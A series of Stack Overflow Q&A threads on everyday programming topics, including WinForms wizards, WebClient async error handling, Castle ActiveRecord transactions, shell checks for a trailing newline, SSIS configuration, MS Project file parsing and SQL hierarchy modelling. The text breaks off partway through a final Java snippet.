*A wizard framework by Shawn Wildermuth, part of Chris Sells's Genghis framework: http://www.sellsbrothers.com/tools/genghis/
A: Use a tab-control inside a form.
Change back color to "Control" in all tab-pages.
Set "appearance" to flat buttons to get rid of the white border-stuff.
Hide the tabs by sizing the entire control so that the tabs get pushed up "under" the title bar of the form. If you need other controls (or maybe a banner) above the tab-control, then instead hide the tabs with a panel-control or similar.
Child's play to code the logic for the back/next buttons, and very easy to extend with new pages.
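A rough sketch of that back/next plumbing, assuming a form with a TabControl named wizardTabs and buttons named btnBack and btnNext (the names are placeholders):
private void btnNext_Click(object sender, EventArgs e)
{
    if (wizardTabs.SelectedIndex < wizardTabs.TabCount - 1)
        wizardTabs.SelectedIndex++;
    UpdateButtons();
}

private void btnBack_Click(object sender, EventArgs e)
{
    if (wizardTabs.SelectedIndex > 0)
        wizardTabs.SelectedIndex--;
    UpdateButtons();
}

private void UpdateButtons()
{
    // Adding a new TabPage is all it takes to add another wizard page
    btnBack.Enabled = wizardTabs.SelectedIndex > 0;
    btnNext.Text = wizardTabs.SelectedIndex == wizardTabs.TabCount - 1 ? "Finish" : "Next >";
}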
A: Take a look at this article on MSDN about "inductive user interfaces". It describes a framework (and provides the code to download) based on UserControls that give you "navigation" within a form. Perfect for designing wizards.
A: The easiest way to create a wizard dialog is to use one of the third-party versions available that handle all of the "hard stuff" (the page navigation, UI framework, etc.) for you. The one I like the most is from Divelements; they have both a WinForms and a WPF version.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38719",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "26"
} |
Q: WebClient.DownloadFileAsync fails to raise exception An odd issue that I have been trying to address in a project - my calls to WebClient.DownloadFileAsync seem to be getting ignored and no exceptions are being raised. So far I have been able to determine this might be due to the destination folder not existing, but from the looks of the MSDN documentation for WebClient.DownloadFileAsync this should still cause an exception to be raised. I did find one MSDN forum thread that seems to imply that this has been known to happen, but there doesn't seem to be any resolution for it. Any ideas what might be going on?
A: In an Async method, Exceptions aren't thrown, but rather passed through to the callback in the EventArgs object.
A: This issue was resolved after reviewing MSDN and the source code involved. Previously the application was only implementing the DownloadProgressChangedEventHandler to track how much of a download remained. This turned out to be the root cause of the issue, as the AsyncCompletedEventHandler (the DownloadFileCompleted event) is what is invoked when an exception occurs, and not implementing this event handler leaves you with no notification of errors.
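For anyone hitting the same thing, a minimal sketch of wiring up both handlers (System.Net; the URL and file path are placeholders):
var client = new WebClient();

client.DownloadProgressChanged += (s, e) =>
    Console.WriteLine(e.ProgressPercentage + "% complete");

// Exceptions from the async call surface here in e.Error - they are never thrown at the call site.
client.DownloadFileCompleted += (s, e) =>
{
    if (e.Error != null)
        Console.WriteLine("Download failed: " + e.Error.Message);
    else if (e.Cancelled)
        Console.WriteLine("Download cancelled.");
    else
        Console.WriteLine("Download finished.");
};

client.DownloadFileAsync(new Uri("http://example.com/file.zip"), @"C:\temp\file.zip");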
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38726",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Do you know how to implement transactions in Castle ActiveRecord? I decided to make a system for a client using Castle ActiveRecord; everything went well until I found that the transactions do not work. For instance:
TransactionScope t = new TransactionScope();
try
{
member.Save();
//This is just to see transaction working
throw new Exception("Exception");
foreach (qfh.Beneficiary b1 in l)
{
b1.Create();
}
}
catch (Exception ex)
{
t.VoteRollBack();
MessageBox.Show(ex.Message);
}
finally
{
t.Dispose();
}
But it doesn't work. I throw an Exception just to test that the transaction rolls back, but to my surprise I see that the first [Save] is recorded in the database. What is happening?
I'm new to Castle and NHibernate. At first I found it very attractive and decided to go with it and MySQL (I've never worked with this DB). I tried ActiveWriter and it seemed very promising, but after a long and hard week I hit this issue and now I feel stuck, like I've wasted my time. It is supposed to be easy, but right now I'm feeling frustrated because I cannot find enough information to make this work. Can you help me?
A: You need to wrap the code in a session scope, like this:
using(new SessionScope())
{
a.Save();
b.Save();
c.Save();
}
Read more here.
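Applied to the snippet in the question, a rough sketch would look like this (note the VoteCommit call, which the original code never reaches because of the test exception):
using (new SessionScope())
{
    TransactionScope t = new TransactionScope();
    try
    {
        member.Save();
        foreach (qfh.Beneficiary b1 in l)
        {
            b1.Create();
        }
        t.VoteCommit();
    }
    catch (Exception ex)
    {
        t.VoteRollBack();
        MessageBox.Show(ex.Message);
    }
    finally
    {
        t.Dispose();
    }
}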
A: Ben's got it. That doc is a little confusing. Refer to the last block on the page, "Nested transactions".
A: I finally fixed it. It turned out I was doing it wrong: I had overridden the Save method of the Member class and created a SessionScope inside it, with a TransactionScope inside that. So when I wrapped all of that in an outer transaction scope, the data had already been committed by the inner scope, and by the time I threw the exception everything was already saved. I think that's it.
All in all, thanks for the help.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38729",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: How to detect file ends in newline? Over at Can you modify text files when committing to subversion? Grant suggested that I block commits instead.
However I don't know how to check whether a file ends with a newline. How can you detect that the file ends with a newline?
A: Using only bash:
x=`tail -n 1 your_textfile`
if [ "$x" == "" ]; then echo "empty line"; fi
(Take care to copy the whitespaces correctly!)
@grom:
tail does not return an empty line
Damn. My test file didn't end on \n but on \n\n. Apparently vim can't create files that don't end on \n (?). Anyway, as long as the “get last byte” option works, all's well.
A: You could use something like this as your pre-commit script:
#! /usr/bin/perl
while (<>) {
$last = $_;
}
if (! ($last =~ m/\n$/)) {
print STDERR "File doesn't end with \\n!\n";
exit 1;
}
A: Worked for me:
tail -n 1 /path/to/newline_at_end.txt | wc --lines
# according to "man wc" : --lines - print the newline counts
So wc counts number of newline chars, which is good in our case.
The one-liner prints either 0 or 1 according to the presence of a newline at the end of the file.
A: Here is a useful bash function:
function file_ends_with_newline() {
[[ $(tail -c1 "$1" | wc -l) -gt 0 ]]
}
You can use it like:
if ! file_ends_with_newline myfile.txt
then
echo "" >> myfile.txt
fi
# continue with other stuff that assumes myfile.txt ends with a newline
A: @Konrad: tail does not return an empty line. I made a file that has some text that doesn't end in newline and a file that does. Here is the output from tail:
$ cat test_no_newline.txt
this file doesn't end in newline$
$ cat test_with_newline.txt
this file ends in newline
$
Though I found that tail has a "get last byte" option. So I modified your script to:
#!/bin/sh
c=`tail -c 1 $1`
if [ "$c" != "" ]; then
echo "no newline"
fi
A: A complete Bash solution with only the tail command, that also deals correctly with empty files.
#!/bin/bash
# Return 0 if file $1 exists and ending by end of line character,
# else return 1
[[ -s "$1" && -z "$(tail -c 1 "$1")" ]]
*
*-s "$1" checks if the file is not empty
*-z "$(tail -c 1 "$1")" checks if its last (existing) character is end of line character
*the result of the whole [[...]] conditional expression is what gets returned
You can also define this Bash function to use it in your scripts.
# Return 0 if file $1 exists and ending by end of line character,
# else return 1
check_ending_eol() {
[[ -s "$1" && -z "$(tail -c 1 "$1")" ]]
}
A: Or even simpler:
#!/bin/sh
test "$(tail -c 1 "$1")" && echo "no newline at eof: '$1'"
But if you want a more robust check:
test "$(tail -c 1 "$1" | wc -l)" -eq 0 && echo "no newline at eof: '$1'"
A: The read command cannot read a line that does not end with a newline.
if tail -c 1 "$1" | read -r line; then
echo "newline"
fi
Another answer.
if [ $(tail -c 1 "$1" | od -An -b) = 012 ]; then
echo "newline"
fi
A: I'm coming up with a correction to my own answer.
Below should work in all cases with no failures:
nl=$(printf '\012')
nls=$(wc -l "${target_file}")
lastlinecount=${nls%% *}
lastlinecount=$((lastlinecount+1))
lastline=$(sed ${lastlinecount}' !d' "${target_file}")
if [ "${lastline}" = "${nl}" ]; then
echo "${target_file} ends with a new line!"
else
echo "${target_file} does NOT end with a new line!"
fi
A: You can get the last character of the file using tail -c 1.
my_file="/path/to/my/file"
if [[ $(tail -c 1 "$my_file") != "" ]]; then
echo "File doesn't end with a new line: $my_file"
fi
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38746",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "31"
} |
Q: Concurrent collections in C# I'm looking for a way of getting a concurrent collection in C# or at least a collection which supports a concurrent enumerator. Right now I'm getting an InvalidOperationException when the collection over which I'm iterating changes.
I could just deep copy the collection and work with a private copy but I'm wondering if there is perhaps a better way
Code snippet:
foreach (String s in (List<String>) callingForm.Invoke(callingForm.delegateGetKillStrings))
{
//do some jazz
}
--edit--
I took the answer but also found that I needed to ensure that the code which was writing to the collection needed to attempt to get a lock as well.
private void addKillString(String s)
{
lock (killStrings)
{
killStrings.Add(s);
}
}
A: Other than doing a deep-copy your best bet might be to lock the collection:
List<string> theList = (List<string>)callingForm.Invoke(callingForm.delegateGetKillStrings);
// List<T> exposes SyncRoot only through the non-generic ICollection interface
lock (((System.Collections.ICollection)theList).SyncRoot) {
foreach(string s in theList) {
// Do some Jazz
}
}
A: So I'm not quite sure what you're asking, but the Parallel Extensions team has put together some stuff that might fit the bill. See this blog post in particular, about enumerating parallel collections. It also contains a link to download the Parallel CTP, and you can of course browse through the rest of the blog posts to get an idea of what the CTP is meant to do and how the programming model works.
A: If you want to use the FCL collections, then locking is the only way to support iteration / modification from multiple threads that may overlap.
Be careful what you use as your lock object, though. Using SyncRoot is only a good idea if the collection itself is a private member of the class that uses it. If the collection is protected or public, then a client of your class can take its own lock on your SyncRoot, potentially deadlocking with code in your class.
If you are interested in taking a look at a 3rd-party collection library, I recommend the excellent C5 Generic Collection Library. They have a family of tree-based collections that can easily and safely be modified and iterated at the same time without locking - see sections 8.10 and 9.11 of their (excellent) documentation for details.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38756",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: What design pattern is PEAR DB_DataObject implementing? DB_DataObject does not appear to be ActiveRecord because you do not necessarily store business logic in the "table" classes. It seems more like Table Data Gateway or Row Data Gateway, but I really cannot tell. What I need is a good ORM layer that we can use with a DataMapper and a DomainModel. Any ideas?
A: Follow this link to read what DB_DO is. In a nutshell, it doesn't implement a specific pattern, it just aims to provide a common interface. The idea is to not rebuild the same basic code in each project.
As for an ORM, I'd recommend Doctrine. It implements ActiveRecord.
A: It sounds like what you're looking for is something like IBatis for PHP. Sadly, this doesn't yet exist. I've actually written some custom DataMapper stuff based on PDO for the current application I'm working on to achieve a persistence ignorant domain layer. It's definitely more work to develop and maintain though, so I would suggest if at all possible, go with an existing data layer implementation like Doctrine for most of your needs.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38763",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: How do I use a different database connection for package configuration? I have an SSIS Package that sets some variable data from a SQL Server Package Configuration Table. (Selecting the "Specify configuration settings directly" option)
This works well when I'm using the Database connection that I specified when developing the package. However when I run it on a server (64 bit) in the testing environment (either as an Agent job or running the package directly) and I Specify the new connection string in the Connection managers, the package still reads the settings from the DB server that I specified in development.
All the other Connections take up the correct connection strings, it only seems to be the Package Configuration that reads from the wrong place.
Any ideas or am I doing something really wrong?
A: The only way I was able to do this was to use Windows Environment Variables. You can specify things like connection strings and user preferences in environment variables, and then pick up those environment variables from your SSIS Task.
A: I prefer to use Server Aliases in the SQL Client Configuration. That way, when you decide to point the package to another SQL Server it is as simple as editing the alias to point to the new server, no editing necessary in the SSIS package. When moving the package to a live server, you need to add the aliases, and it works.
This also helps when you have a real painful naming convention for servers, the alias can be a more descriptive name than the actual machine name.
A: I didn't actually understand your question completely, but I store my connection settings in configuration files, usually one for each environment like dev, production etc. The packages read the connection settings from the config files when they are run.
A: When you're creating a job to call the SSIS package, and you're setting up the step, there is a tabbed area. The default tab is where you set the package name, and the next tab over is where you can set the configuration file. Have a config file for each package, and change for the server (dev, test, prod). The config file can be put directly on the dev, test, and prod servers, and then point to them when setting up that job.
A: If you are using SQL Server Package Configuration then all the properties of the packages will come from the SQL Server table - please check that.
A: We want to keep our package configs in a database table, we know it gets backuped with our other data and we know where to find it. Just a preference.
I have found that to get this to work I can use an environment variable configuration to set the connection string of the connection manager that I am reading my package config from. (Although I had to restart the SQL Server agent before it could find the new environment variable. Not ideal when I deploy this to Production)
Looks like when you run an SSIS package as a step in a scheduled task it works in this order:
*
*Load each of the Package Configs in the order they appear in the Package Configuations Organiser
*Set the Connection Strings from the Data sources tab in the Job Step properties of the Scheduled Job
*Start running package.
I would have expected the first 2 to be the other way around so that I can set the data source for my package config from the scheduled job. That is where I would expect other people to look for it when maintaining the package.
A: SSIS security the way it stands is terrible. No one will be able to support things when I am out of the office. The job never reads from the configuration file...I give up. It only works when I edit the string in the Data sources tab. However the password gets lost if you happen to go into the job a second time. Terrible design, absolutely horrible. You would think that when you specify a xml file in the job step it would read the connection string from there that is defined, but it does not. Does this really work for anyone else?
A: Go to the package properties and set Deployment to True. This should work for what you have done.
A: I had the identical question, and got the same answer, i.e. you cannot edit the connection string used for package configurations hosted in SQL Server, except if you specify that the SQL Server connection string should be in an environment variable.
This unfortunately does not work in my dev setup, where two environments are hosted on the same machine. I ended up following Scott Coleman's approach as detailed on SQL Server Central [Free sign-up and a good site]. The trick is that you create a view to store your configuration settings on one central server, and then use the machine that connects to it to determine which environment is active.
I used that approach, but also used the User connecting to the environment to make a determination, because my test and dev setups run on the same SSIS instance, but as different user names. Scott suggests in the comments that the application name should be set, but this cannot be changed in the package execution job step, so it was not an option.
One other caveat that I found was that I had to add "Instead of" triggers to my view to do the inserts, updates and deletes for configuration variables.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38766",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: How would you extract data from a MS Project .mpp file? I need to extract data from a .mpp file on the network and combine it with other data from several different databases. The application can be written in Perl, VB6, VB.net or C# but must be easily scheduled from a Windows based server.
What would you recommend to extract the MS Project data with no user intervention?
Is there any ODBC drivers available for MS Project?
Are there any modules (for Perl, VB, VB.net or C#) for opening a .mpp and reading activity data?
A: I would recommend using MPXJ (mpxj.sf.net) to extract data from Microsoft Project files. Don't be put off by the fact that it was originally a Java library - the current release of MPXJ includes native .net dlls as well as the original Java JAR file, thanks to the magic of IKVM.
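To give a feel for the API, here is a rough sketch in the Java flavour (the .NET assemblies expose the same classes via IKVM; exact method names can vary between MPXJ versions, and the UNC path is a placeholder, so treat this as illustrative rather than definitive):
import net.sf.mpxj.ProjectFile;
import net.sf.mpxj.Task;
import net.sf.mpxj.mpp.MPPReader;

public class DumpTasks
{
    public static void main(String[] args) throws Exception
    {
        // Read the .mpp straight from the network share
        ProjectFile project = new MPPReader().read("\\\\server\\share\\plan.mpp");
        for (Task task : project.getAllTasks())
        {
            System.out.println(task.getID() + "\t" + task.getName()
                + "\t" + task.getStart() + "\t" + task.getFinish());
        }
    }
}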
Disclaimer: I maintain MPXJ.
A: MPP does have its own object model that can be used to access data in it. The info should be available here: http://msdn.microsoft.com/en-us/office/aa905469.aspx
A: Hope the following helps...
http://www.codeproject.com/KB/cs/PrjXlsRpt.aspx
Rgds
A: In order to read the MPP data you can use Aspose.Tasks for .NET. This component is a normal .NET assembly and can be used with any .NET application. It provides simple API to access project elements and data.
Disclosure: I work as developer evangelist at Aspose.
A: I have the same need. Here is what I found so far.
There is an OLEDB provider for Microsoft Project, up to Microsoft Project 2007.
If you Google it, there are enough sites quoting the connection string, but here is one quote:
oConn.Open "Provider=Microsoft.Project.OLEDB.9.0;" & _
"Project Name=c:\somepath\myProject.mpp"
The problem with this approach seems to be that you have to install MS Project on the server. It is a nuisance in any case, and an impossibility for me since I am using a hosting environment.
So you are down to parsing .mpp. MPXJ is an excellent library as one commenter above suggests, and I can afford to wait, so I am waiting for them to release the .NET version.
If you are resolved to get it done, get the code and see what they are doing. Other than in their source code/comments there is no (to my knowledge) documentation of the format.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38769",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: What SPN do I need to set for a net.tcp service? I have a wcf application hosted in a windows service running a local windows account. Do I need to set an SPN for this account? If so, what's the protocol the SPN needs to be set under? I know how to do this for services over HTTP, but have never done it for net.tcp.
A: Change the service account to an AD account and register the SPNs as shown. Use your own service name, e.g. fooservice
setspn -A fooservice/servermachinename domain\serviceAccountName
setspn -A fooservice/servermachinename.fullyqualifieddomainname domain\serviceAccountName
In the client config set:
<identity>
  <servicePrincipalName value="fooservice/servermachinename" />
</identity>
A: By default (i.e. out of the box) net.tcp services are unsecured and don't perform any authentication at all. So you won't need (and in fact can't) set a service principal name.
If you need to authenticate, then check the net.tcp security modes on MSDN. The best way to understand the different combinations is to experiment!
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38779",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Visual Studio equivalent to Delphi bookmarks I have used Delphi for many years, and although I have now moved on to Visual Studio I still fondly remember numbered bookmarks (CTRL+K+1 to set bookmark 1, CTRL+Q+1 to go to bookmark 1).
Is there a Visual Studio equivalent? I find the dumb bookmarks in VS a chore after Delphi. I want to bookmark and then return to a specific place in the file.
A: Ctrl K + Ctrl K - Add/Remove Bookmark on Line
Ctrl K + Ctrl N - Go to Next Bookmark
Ctrl K + Ctrl P - Go to Previous Bookmark
There are other options as well. Look under Edit->Bookmarks menu,
A: More a comment on your original question than an actual answer but Delphi has had much easier to remember (and type) keyboard shortcuts than what you quote available for quite some time now:
*
*Set bookmark 1: Ctrl-Shift-1
*Go to bookmark 1: Ctrl-1
If you ever go back to Delphi, this should make your life so much easier! ;)
A: DPack can give you numbered bookmarks in VisualStudio.
A: I find this one also very useful:
CtrlK + CtrlL - Clear all bookmarks
A: Just to amplify Lars Truijens' answer. DPack is a GExperts-like plugin for Visual Studio. I found it a great help when moving from the Delphi IDE to Visual Studio.
A: There is a Bookmark Window. Go to menu View/Bookmark Window (Ctrl+K, Ctrl+W).
In there you can see all your bookmarks and rename them. That is a lot better than just seeing the numbers.
For some reason they don't allow ordering that list by clicking a column header, but you can drag the bookmarks and arrange them in the order you want.
A: I use:
*
*CTRL-F2 toggle bookmark
*F2 next bookmark
*SHIFT-F2 previous bookmark
*CTRL-SHIFT-F2 clear all bookmarks
BTW, after using Visual Studio for years I only found out a couple of months ago that you can press ALT and drag the mouse to mark a column or a square.
A: VSBookmarks gives something like the fantastic Delphi bookmarks feature. Tested and works in Visual Studio 2019.
*
*Extensions > Search "VSBookmarks" (v1.7 at time of writing)
*Install and restart Visual Studio
*Use Ctrl + Shift + N to set a bookmark
*Use Ctrl + N to move to a previous bookmark
There will likely be conflicts with existing keyboard shortcuts. To view and edit these:
*
*Tools > Options > Environment > Keyboard
*In "Press shortcut keys" type Ctrl + Shift + 1
*See which command(s) are currently assigned to the shortcut
*Find the command in the list and remove the shortcut
*Repeat for Ctrl + Shift + 1 through Ctrl + Shift + 9, and for Ctrl + 1 through Ctrl + 9
VSBookmarks applies only within the current file (which is the Delphi behaviour), and it offers just a single colour for bookmarks, which is not configurable.
Delphi is an awesome language and editor. Thanks to Sergey Vinyar and Alessandro Fragnani (for the Numbered Bookmarks extension in Visual Studio Code) for keeping the flame alive.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38784",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Web Service Namespace Dynamic Naming I have a web-service that I will be deploying to dev, staging and production. Along with this will be an ASP.net application that will be deploying separately but also in those three stages.
What is the most pragmatic way to change the following line in the web-service to match the current environment?
[WebService(Namespace = "http://dev.mycompany.com/MyAppsWebService")]
[WebService(Namespace = "http://stage.mycompany.com/MyAppsWebService")]
[WebService(Namespace = "http://mycompany.com/MyAppsWebService")]
A: Your webservice object has a "URL" property on it which can be set via the web.config file. There's a config file that gets created when you add the web reference to your application that you should copy the contents of to your web.config or app.config file. You can then deploy the config file and not have to manage any code changes to accomodate the change in url.
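If you would rather keep it in appSettings, a small sketch of the same idea (the key name and proxy class below are made up for illustration; the generated proxy's Url property is what actually gets overridden):
// web.config / app.config
// <appSettings>
//   <add key="MyAppsWebServiceUrl" value="http://dev.mycompany.com/MyAppsWebService.asmx" />
// </appSettings>

var service = new MyCompany.MyAppsWebService();
service.Url = System.Configuration.ConfigurationManager.AppSettings["MyAppsWebServiceUrl"];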
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38789",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Which database table Schema is more efficient? Which Database table Schema is more efficient and why?
"Users (UserID, UserName, CompamyId)"
"Companies (CompamyId, CompanyName)"
OR
"Users (UserID, UserName)"
"Companies (CompamyId, CompanyName)"
"UserCompanies (UserID, CompamyId)"
Given the fact that user and company have a one-to-one relation.
A: Well, that's a bit of an open-ended question and depends on your business rules. The first option you have only allows one company to be mapped to one user: you're defining a many-to-one relationship.
The second schema defines a many-to-many relationship which allows multiple users to be mapped to multiple companies.
They solve different problems and depending on what you're trying to solve will determine what schema you should use.
Strictly speaking from a "transactions" point of view, the first schema will be quicker because you only have to commit one row for a user object to be associated to a company, and to retrieve the company that your user works for requires only one join. However, the second solution will scale better if your business requirements change and require you to have multiple companies assigned to a user.
A: For sure, the earlier one is more efficient given that constraint. For getting the same information, you will have fewer joins in your queries.
A: As always, it depends. I would personally go with answer number one since it would have fewer joins and would be easier to maintain. Fewer joins should mean that it requires fewer table and index scans.
SELECT userid, username, c.companyid, companyname
FROM companies c, users u
WHERE u.companyid = c.companyid
Is much better than...
SELECT u.userid, username, c.companyid, companyname
FROM companies c, users u, usercompanies uc
WHERE u.userid = uc.userid
AND c.companyid = uc.companyid
A: The two schemas cannot be compared, as they have different relationships; you should probably look at what the spec is for the tables and then work out which one fits the relationship needed.
The first one implies that a User can only be a member of one company (a belongs_to relationship). Whereas the second schema implies that a User can be a member of many companies (a has_many relationship)
If you are looking for a schema that can (or will later) support a has_many relationship then you want to go with the second one. For the reason compare:
//select all users in company x with schema 1
select username, companyname from companies
inner join users on users.companyid = companies.companyid
where companies.companyid = __some_id__;
and
//select all users in company x with schema 2
select username, companyname from companies
inner join usercompanies on usercompanies.companyid = companies.companyid
inner join users on usercompanies.userid = users.userid
where companies.companyid = __some_id__;
You have an extra join on the select table. If you only want the belongs_to relationship then the second query does more work than it should - and so makes it less efficient.
A: I think you mean "many to one" when it comes to users and companies - unless you plan on having a unique company for each user.
To answer your question, go with the first approach. One less table to store reduces space and will make your queries use less JOIN commands. Also, and more importantly, it correctly matches your desired input. The database schema should describe the format for all valid data - if it fits the format it should be considered valid. Since a user can only have one company it's possible to have incorrect data in your database if you use the second schema.
A: If User and Company really have a one-to-one relationship, then you only need one table:
(ID, UserName, CompanyName)
But I suspect you really meant that there is a one-to-many relationship between user and company - one or more users pr company but only one company pr user. In that case the two-table solution is correct.
If there is a many-to-many relationship (a company can have several users and a user can be attached to several companies), then the three-table solution is correct.
Note that efficiency is not really the issue here. Its the nature of the data that dictates which solution you should use.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38791",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: SQL - How to store and navigate hierarchies? What are the ways that you use to model and retrieve hierarchical info in a database?
A: FYI: SQL Server 2008 introduces a new HierarchyID data type for this sort of situation. Gives you control over where in the "tree" your row sits, horizontally as well as vertically.
A: I like the Modified Preorder Tree Traversal Algorithm. This technique makes it very easy to query the tree.
But here is a list of links about the topic which I copied from the Zend Framework (PHP) contributors webpage (posted there by Posted by Laurent Melmoux at Jun 05, 2007 15:52).
Many of the links are language agnostic:
There are 2 main representations and algorithms to represent hierarchical structures with databases:
*
*nested set also known as modified preorder tree traversal algorithm
*adjacency list model
It's well explained here:
*
*http://www.sitepoint.com/article/hierarchical-data-database
*Managing Hierarchical Data in MySQL
*http://www.evolt.org/article/Four_ways_to_work_with_hierarchical_data/17/4047/index.html
Here are some more links that I've collected:
*
*http://en.wikipedia.org/wiki/Tree_%28data_structure%29
*http://en.wikipedia.org/wiki/Category:Trees_%28structure%29
adjacency list model
*
*http://www.sqlteam.com/item.asp?ItemID=8866
nested set
*
*http://www.sqlsummit.com/AdjacencyList.htm
*http://www.edutech.ch/contribution/nstrees/index.php
*http://www.phpriot.com/d/articles/php/application-design/nested-trees-1/
*http://www.dbmsmag.com/9604d06.html
*http://en.wikipedia.org/wiki/Tree_traversal
*http://www.cosc.canterbury.ac.nz/mukundan/dsal/BTree.html (Java applet showing how it works)
Graphs
*
*http://www.artfulsoftware.com/mysqlbook/sampler/mysqled1ch20.html
Classes:
Nested Sets DB Tree Adodb
*
*http://www.phpclasses.org/browse/package/2547.html
Visitation Model ADOdb
*
*http://www.phpclasses.org/browse/package/2919.html
PEAR::DB_NestedSet
*
*http://pear.php.net/package/DB_NestedSet
*usage: https://www.entwickler.com/itr/kolumnen/psecom,id,26,nodeid,207.html
PEAR::Tree
*
*http://pear.php.net/package/Tree/download/0.3.0/
*http://www.phpkitchen.com/index.php?/archives/337-PEARTree-Tutorial.html
nstrees
*
*http://www.edutech.ch/contribution/nstrees/index.php
A: Oracle: SELECT ... START WITH ... CONNECT BY
Oracle has an extension to SELECT that allows easy tree-based retrieval. Perhaps SQL Server has some similar extension?
This query will traverse a table where the nesting relationship is stored in parent and child columns.
select * from my_table
start with parent = :TOP
connect by prior child = parent;
http://www.adp-gmbh.ch/ora/sql/connect_by.html
A: I prefer a mix of the techniques used by Josh and Mark Harrison:
Two tables, one with the data of the Person and the other with the hierarchical info (person_id, parent_id [, mother_id]). If the PK of this table is person_id, you have a simple tree with only one parent per node (which makes sense in this case, but not in other cases like accounting accounts).
This hierarchy table can be traversed by recursive procedures or, if your DB supports it, by statements like SELECT ... CONNECT BY PRIOR (Oracle).
Another possibility, if you know the max depth of the hierarchy data you want to maintain, is to use a single table with a set of columns per level of hierarchy.
A: The definitive pieces on this subject have been written by Joe Celko, and he has worked a number of them into a book called Joe Celko's Trees and Hierarchies in SQL for Smarties.
He favours a technique called directed graphs. An introduction to his work on this subject can be found here
A: What's the best way to represent a hierarchy in a SQL database? A generic, portable technique?
Let's assume the hierarchy is mostly read, but isn't completely static. Let's say it's a family tree.
Here's how not to do it:
create table person (
person_id integer autoincrement primary key,
name varchar(255) not null,
dob date,
mother integer,
father integer
);
And inserting data like this:
person_id name dob mother father
1 Pops 1900/1/1 null null
2 Grandma 1903/2/4 null null
3 Dad 1925/4/2 2 1
4 Uncle Kev 1927/3/3 2 1
5 Cuz Dave 1953/7/8 null 4
6 Billy 1954/8/1 null 3
Instead, split your nodes and your relationships into two tables.
create table person (
person_id integer autoincrement primary key,
name varchar(255) not null,
dob date
);
create table ancestor (
ancestor_id integer,
descendant_id integer,
distance integer
);
Data is created like this:
person_id name dob
1 Pops 1900/1/1
2 Grandma 1903/2/4
3 Dad 1925/4/2
4 Uncle Kev 1927/3/3
5 Cuz Dave 1953/7/8
6 Billy 1954/8/1
ancestor_id descendant_id distance
1 1 0
2 2 0
3 3 0
4 4 0
5 5 0
6 6 0
1 3 1
2 3 1
1 4 1
2 4 1
1 5 2
2 5 2
4 5 1
1 6 2
2 6 2
3 6 1
You can now run arbitrary queries that don't involve joining the table back on itself, which would happen if you have the hierarchy relationship in the same row as the node.
Who has grandparents?
select * from person where person_id in
(select descendant_id from ancestor where distance=2);
All your descendants:
select * from person where person_id in
(select descendant_id from ancestor
where ancestor_id=1 and distance>0);
Who are uncles?
select descendant_id uncle from ancestor
where distance=1 and ancestor_id in
(select ancestor_id from ancestor
where distance=2 and not exists
(select ancestor_id from ancestor
where distance=1 and ancestor_id=uncle)
)
You avoid all the problems of joining a table to itself via subqueries; a common limitation is 16 subqueries.
Trouble is, maintaining the ancestor table is kind of hard - best done with a stored procedure.
A: I've got to disagree with Josh. What happens if you're using a huge hierarchical structure like a company organization. People can join/leave the company, change reporting lines, etc... Maintaining the "distance" would be a big problem and you would have to maintain two tables of data.
This query (SQL Server 2005 and above) would let you see the complete line of any person AND calculates their place in the hierarchy and it only requires a single table of user information. It can be modified to find any child relationship.
--Create table of dummy data
create table #person (
personID integer IDENTITY(1,1) NOT NULL,
name varchar(255) not null,
dob date,
father integer
);
INSERT INTO #person(name,dob,father)Values('Pops','1900/1/1',NULL);
INSERT INTO #person(name,dob,father)Values('Grandma','1903/2/4',null);
INSERT INTO #person(name,dob,father)Values('Dad','1925/4/2',1);
INSERT INTO #person(name,dob,father)Values('Uncle Kev','1927/3/3',1);
INSERT INTO #person(name,dob,father)Values('Cuz Dave','1953/7/8',4);
INSERT INTO #person(name,dob,father)Values('Billy','1954/8/1',3);
DECLARE @OldestPerson INT;
SET @OldestPerson = 1; -- Set this value to the ID of the oldest person in the family
WITH PersonHierarchy (personID,Name,dob,father, HierarchyLevel) AS
(
SELECT
personID
,Name
,dob
,father,
1 as HierarchyLevel
FROM #person
WHERE personID = @OldestPerson
UNION ALL
SELECT
e.personID,
e.Name,
e.dob,
e.father,
eh.HierarchyLevel + 1 AS HierarchyLevel
FROM #person e
INNER JOIN PersonHierarchy eh ON
e.father = eh.personID
)
SELECT *
FROM PersonHierarchy
ORDER BY HierarchyLevel, father;
DROP TABLE #person;
A: We had the same issue when we implemented a tree component for [fleXive] and used the nested set tree model approach mentioned by tharkun from the MySQL docs.
In addition, to speed things up (dramatically) we used a spread approach, which simply means we used the maximum Long value for the top-level right bounds, which allows us to insert and move nodes without recalculating all left and right values. Values for left and right are calculated by dividing the range for a node by 3 and using the inner third as bounds for the new node.
A java code example can be seen here.
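As a rough illustration of that calculation (not the actual [fleXive] code): a node inserted under a parent takes the inner third of the parent's free range, so neighbouring nodes never need to be renumbered:
long parentLeft = 0L;
long parentRight = Long.MAX_VALUE;      // top level uses the maximum Long value as right bound

long range = parentRight - parentLeft;
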